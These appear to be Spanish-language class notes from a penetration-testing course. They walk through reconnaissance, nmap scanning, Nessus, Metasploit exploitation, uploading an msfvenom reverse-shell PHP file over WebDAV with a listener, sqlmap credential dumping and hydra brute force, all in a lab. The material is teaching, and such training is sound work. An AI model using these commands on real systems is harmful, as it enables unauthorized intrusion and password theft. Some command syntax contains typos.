Está en la página 1de 5

UT 1

CLASE I
PASOS PARA UN PENTESTING
PREACUERDO: AUERDO DE LAS PARTES, SE FIJAN LAS NECESIDADES DEL CLIENTE Y LOS HON
ORARIOS DEL PROFESIONAL DE SEGURIDAD.
RECOLECCION DE INFORMACION:
RECOLECTAR INFO DE FUENTES ABIERTAS INTELIGENTES, EJM FACEBOOK, ISTAGRAM, ETC.
MODELADO AMENAZAS: PLANIFICAR ATAQUES, POR DONDE IR, DONDE ATACAR
ANALISIS DE VULNERABILIDADES:ASEGURAR QUE EL EXPLOIT FUNCIONE SABIENDO CUAL ES L
A VULNERABILIDAD
EXPLOTACION: SACAR PROVECHO DE LAS VULNERABILIDADES DEL SISTEMA
POST-EXPLOTACION:UNA VEZ EN EL SISTEMA, SE PUEDE ESCALAR, IR A OTROS LUGARES DE
LA RED, SACAR CONTRASEAS DE OTROS LUGARES.
REPORTE: IMPORTANTISIMO PARA EL CLIENTE, DOCUMENTAR LOS RESULTADOS, CON INFORME
EJECUTIVO PARA CEO, GERENCIA, ETC.DAR UN INFORME CON
PERFIL DE RIESGO, Y UN REPORTE TCNICO PARA EL ADMINISTRADOR DE SISTEMAS.
==============================================================================
CLASE II: LABORATORIO DE PENTESTING
* VIRTUAL BOX
- WINDOWS XP (VICTIMA)
- WINDOWS 7 (VICTIMA)
- KALI LINUX (ATACANTE)
* CONEXION A INTERNET
* CEREBRO
KALI Y TODAS LAS MQUINAS SE DEBEN CONFIGURAR CON ADAPTADOR PUENTE (PARA QUE QUEDE
N EN LA MISMA RED DE LAS VCTIMAS).
INSTALAR WEB FOR PENTESTERS (DESCARGAR ISO).
===============================================================================
UT II
CLASE I
METODOLOGIA OSINT.
ESTA DENTRO DE LA FASE DE RECOLECCION DE INFO, DESDE FUENTES ABEIRTAS INTELIGENT
ES.
SE USA UNA HERRAMIENTA WEB LLAMADA NETCRAFT, EN ESTA SE INGRESA EL DOMINIO DE LA
EMPRESA.
COMANDO EN LINUX "WHOIS": SE TECLEA EN LA CONSOLA DE KALI, LA SINTAXIS ES "whois
nombre.de.dominio.ext" EJM: whois unab.edu.co
PROPORCIONA INFORMACION IMPORTANTE DE LOS REGISTROS DEL DOMINIO.
THEHARVESTER: ESTA EN KALI, SE DEBE TECLEAR EL COMANDO MAS EL DOMINIO QUE SE DES

EA BUSCAR,
LA SINTAXIS ES "theharvester -d unab.edu.com -l 500 -b google", donde "-d" es el
dominio, -l "lenght" o cantidad de resultados de busqueda
y "-b" el motor de busqueda que se utilizara (google,yahoo,etc).
EL RESULTADO NOS MUESTRA UNA IP PBLICA, DOMINIO Y CORREO.(SUBDOMINIOS Y HOSTS).
================================================================================
CLASE II
OSINT RECOLECCION DE INFORMACION DE MALTEGO
IMPORTANTE HERRAMIENTA PARA BUSQUEDA DE INFORMACION.
SE DEBE LOGEAR, INCRIBIR Y ACCEDER AL SOFTWARE.
COMPANY STALKER SIRVE PARA BUSCAR EMAILS DEL DOMINIO QUE ESTAMOS BUCANDO.TIENE E
N INTERFAZ GRAFICA.
TRANSFORMACIONES:SIRVE PARA LIGAR APLICACIONES AL DOMINIO QUE SE ESTA INVESTIGAN
DO.
MALTEGO MANTIENE SUS TRANSFORMACIONES SEGUN LO QUE ESTEMOS AUDITANDO.RECOLECTA I
NFORMACION DE FUENTES PUBLICAS.
ESTA INFO ES MUY PROBABLE QUE NOS SIRVA PARA LA FASE DE EXPLOTACIN.
================================================================================
=
CLASE III
ESCANEO DE PUERTOS CON NMAP
COMANDOS DE NMAP:
* -sS (SONDEO TCP SYN): NO COMPLETA LAS CONEXIONES, SUELE SER EL MAS SIGILOSO. (
INICIA SESIONES Y NO LAS CIERRA).NEGOCIACION DE TRES PASOS
* SINTAXIS "nmap -sS 192.168.0.1 (ip objetivo o puerta enlace)"
el resultado muestra los puertos abiertos.
* SINTAXIS PARA BUSQUEDA DETALLADA "nmap -sS -Sv 192.168.1.1 (ip objetivo)"
el resultado muestra informacion detallada de los puertos en uso del hos
t
* -sT (SONDEO TCP CONNECT()): SIRVE CUANDO NO TENEMOS PROVILEGIOS PARA -sS
* SINTAXIS "nmap -sT 192.168.1.1 (ip objetivo)"
el resultado arroja lo mismo que en -sS
* -sU (SONDEO UDP): ENVIO SIN DATOS DE UNA CABECERA UDP PARA CADA PUERTO.
* SINTAXIS "nmap -sU 192.168.1.1 (ip objetivo)"
es mas lento que tcp.
* -sX (SONDEO XMAS): FIJA LOS BITS FIN, PSH Y URG.PUEDE TERMINAR LAS CONEXIONES
DE LOS PUERTOS ELEGIDOS.
* SINTAXIS "nmap -sX 192.168.1.1 (ip objetivo)
una variable puede ser "nmap -sX 192.168.1.1 -oA" y se pone un nombre de
spues de oA.
sirve para sacar el resultado en formatos legibles.
================================================================================
=
UT III
CLASE I
DETECTAR VULNERABILIDADES DE LA VICTIMA
NESSUS
ANTES DE UTILIZAR EXPLOITS, SE BUSCAN VULNERABILIDADES,PARA ASEGURAR EL EXITO DE
L EXPLOIT.

SE UTILIZA UNA HERRAMIENTA LLAMADA NESSUS, ES UN SCANNER DE VULNERABILIDADES.


SE DESCARGA NESSUS HOME, SE INSTALA Y SE EJECUTA VIA WEB.
SE REALIZA UN VULNERABILITY TEST EN LA RED DEL CLIENTE.
SCAN==>EXPLOITS==>PENTEST==>MY SCAN: SE CREA PERFIL DE SCAN CON GRAFICAS DE VULN
ERABILIDADES.
SE SELECCIONA EL GRFICO Y SE VEN LAS DECRIPCIONES DE LAS VULNERABILIDADES.
METASPLOIT
SE ENCUENTRA EN KALI LINUX.
EL COMANDO PARA ESCANEAR EXPLOIT "use scanner/ftp/anonnymous"
#set RHOSTS 192.168.1.12 (ip propia)
#exploit
#use auxiliary/scanner/mysql/mysql_login
#show options
#set RHOST 192.168.1.12
ATAQUE FUERZA BRUTA (antes hay que crear un diccionario)
#set PASS_FILE password
#set USER_FILE
#set RHOST 192.168.1.12
#run
NIKTO
nikto -h 192.168.1.12 (muestra informacion detallada del sistema)
MUESTRA LAS VULNERABILIDADES ENCONTRADAS AL SISTEMA ESCANEADO.
=============================================================================
CLASE II
EXPLOTACION BASICA DE VULNERABILIDADES
ACCESO A LA VICTIMA
PRIMERO VERIFICAMOS CONEXION CON EL EQUIPO VICTIMA
SE EFECTUA UN ESCANEO CON NMAP
SE VERIFICA LA VULNERABILIDAD ENCONTRADA EN NESSUS
WINDOWS XP NO CUENTA CON SOPORTE, POR LO TANTO, LAS VULNERABILIDADES NO SERN CORR
EGIDAS.
LAS VULNERABILIDADES MAS COMPLEJAS Y CRITICAS SON LAS REMOTAS.
METASPLOIT=BUSCAR EXPLOIT PARA LA VULNERABILIDAD ENCONTRADA
COMANDO "use (NOMBRE DEL EXPLOIT)" - "show options" - "set RHOST (IP VICTIMA)" "show payloads" - "set PAYLOAD (NOMBRE DEL PAYLOAD)" - "set lhost (IP ATACANTE)
" - "exploit"
===============================================================================
CLASE III
EXPLOTAR Y ACCEDER A UN SERVIDOR (WEBDav)
cadaver (url de la web)

PEDIRA USER Y PASS, GENERALMETE POR DEFECTO


put "archivo" (subir archivo a la web atacada)
msfvenom -l (ver payloads disponibles)
msfvenom -p "nombre del payload" /reverse_tcp -o (muestra la shell en mi pantall
a)
msfvenom -p "nombre del payload" /reverse_tcp LHOST="mi ip" "puerto" -f raw > "n
ombre del archivo.php"
VOLVEMOS A CADAVER
cadaver (url web)
USERNAME
PASSWORD
put "nombre archivo.php"
CONFIGURAR UN ESCUCHADOR PARA RECIBIR LA CONEXION
ENTRAR A LA CONSOLA DE METASPLOIT
msfconsole
use multihandler
show options
set PAYLOAD "nombre del payload usado en msfvenom"
set LHOST (mi ip)
set LPORT (puerto configurado en msfvenom)
exploit
==========================================================================
CLASE IV
EXPLOTAR Y ACCEDER A UN SERVIDOR (SQL INJECTION)
VISITAR OWASP.ORG
SQLMAP
sqlmap -u "url http"/cat.php?=1 --dbs
n (no buscar otra base de datos)
y (utilizar base de datos mysql)
WAF web app firewall
ENTRAR A LA BASE DE DATOS
sqlmap -u "url http"/cat.php?id=1 -D "nombre de la pagina o base de datos" --tab
les
VER COLUMNA DE UNA TABLA
sqlmap -u "url http"/cat.php?id=1 -D "nombre de la pagina o base de datos" -T (N
OMBRE DE LA TABLA) --columns
VER LOGIN Y PASS
sqlmap -u "url http"/cat.php?id=1 -D "nombre de la pagina o base de datos" -T (N
OMBRE DE LA TABLA) -C login --dump

sqlmap -u "url http"/cat.php?id=1 -D "nombre de la pagina o base de datos" -T (N


OMBRE DE LA TABLA) -C password --dump
COMO SE GUARDAN CIFRADAS EN MD5, EL PROGRAMA INTENTARA DESCIFRARLA, DARLE A "y"
================================================================================
======
UT IV
ATAQUES A CONTRASEAS
ONLINE
HYDRA
DETECTAR NOMBRES DE USUARIOS Y SUS CONTRASEAS (CREAR DICCIONARIOS)
hydra -L usesrs.txt -P passwords.txt 192.168.1.70 ftp